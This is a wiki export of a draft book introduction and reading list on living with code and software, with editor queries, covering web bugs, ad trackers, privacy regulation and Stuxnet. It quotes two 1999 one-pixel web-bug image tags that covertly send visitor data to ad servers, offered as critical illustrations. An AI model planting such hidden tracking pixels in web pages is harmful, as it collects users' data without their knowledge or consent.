{{#widget:Vimeo|id=16263212}} &amp;lt;br&amp;gt; ''Federica Frabetti giving a lecture on code studies and reading source code.'' &lt;br /&gt;
&lt;br /&gt;
== Software Ecologies  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Gilles Deleuze&amp;amp;nbsp;&lt;br /&gt;
:[http://www.n5m.org/n5m2/media/texts/deleuze.htm Postscript on the Societies of Control]&lt;br /&gt;
&lt;br /&gt;
;Felix Guattari&amp;amp;nbsp;&lt;br /&gt;
:[http://www.amielandmelburn.org.uk/collections/newformations/08_131.pdf The Three Ecologies]&lt;br /&gt;
&lt;br /&gt;
;Robert Kitchin&amp;amp;nbsp;&lt;br /&gt;
:[http://www.envplan.com/epb/editorials/b3806com.pdf The Programmable City]&lt;br /&gt;
&lt;br /&gt;
;Bruno Latour : [http://www.bruno-latour.fr/sites/default/files/123-WHOLE-PART-FINAL.pdf The Whole is Always Smaller Than Its Parts- A Digital Test of Gabriel Tarde’s Monads]&lt;br /&gt;
&lt;br /&gt;
;Mathew Fuller and Sonia Matos&amp;amp;nbsp;&lt;br /&gt;
:[http://nineteen.fibreculturejournal.org/fcj-135-feral-computing-from-ubiquitous-calculation-to-wild-interactions/ Feral Computing: From Ubiquitous Calculation to Wild Interactions]&lt;br /&gt;
&lt;br /&gt;
;Jussi Parikka&amp;amp;nbsp;&lt;br /&gt;
:[http://seventeen.fibreculturejournal.org/fcj-116-media-ecologies-and-imaginary-media-transversal-expansions-contractions-and-foldings/ Media Ecologies and Imaginary Media: Transversal Expansions, Contractions, and Foldings]&lt;br /&gt;
&lt;br /&gt;
;David Gelernter&amp;amp;nbsp;&lt;br /&gt;
:[http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html Time to start taking the Internet seriously]&lt;br /&gt;
&lt;br /&gt;
;Adrian Mackenzie&amp;amp;nbsp;&lt;br /&gt;
:[http://www.lancs.ac.uk/staff/mackenza/papers/code-leviathan.pdf The Problem of Computer Code: Leviathan or Common Power?]&lt;br /&gt;
&lt;br /&gt;
;Adrian Mackenzie&amp;amp;nbsp;&lt;br /&gt;
:[http://thirteen.fibreculturejournal.org/fcj-085-wirelessness-as-experience-of-transition/ Wirelessness as Experience of Transition]&lt;br /&gt;
&lt;br /&gt;
;Thomas Goetz&amp;amp;nbsp;&lt;br /&gt;
:[http://www.wired.com/magazine/2011/06/ff_feedbackloop/ Harnessing the Power of Feedback Loops]&lt;br /&gt;
&lt;br /&gt;
;Christian Ulrik Andersen &amp;amp;amp; Søren Pold&amp;amp;nbsp;&lt;br /&gt;
:[http://nineteen.fibreculturejournal.org/fcj-133-the-scripted-spaces-of-urban-ubiquitous-computing-the-experience-poetics-and-politics-of-public-scripted-space/ The Scripted Spaces of Urban Ubiquitous Computing: The experience, poetics, and politics of public scripted space]&lt;br /&gt;
&lt;br /&gt;
;B.J. Fogg, Gregory Cuellar, and David Danielson&amp;amp;nbsp;&lt;br /&gt;
:[http://bjfogg.com/hci.pdf Motivating, Influencing, and Persuading Users]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp;&lt;br /&gt;
:[http://www.youtube.com/OrAo8oBBFIo The quantified self]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;OrAo8oBBFIo&amp;lt;/youtube&amp;gt; &lt;br /&gt;
''The notion of using computational devices in everyday life to record everything about you.''&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/Attributions '''Attributions'''] ==&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4715</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4715"/>
		<updated>2012-04-18T17:26:29Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
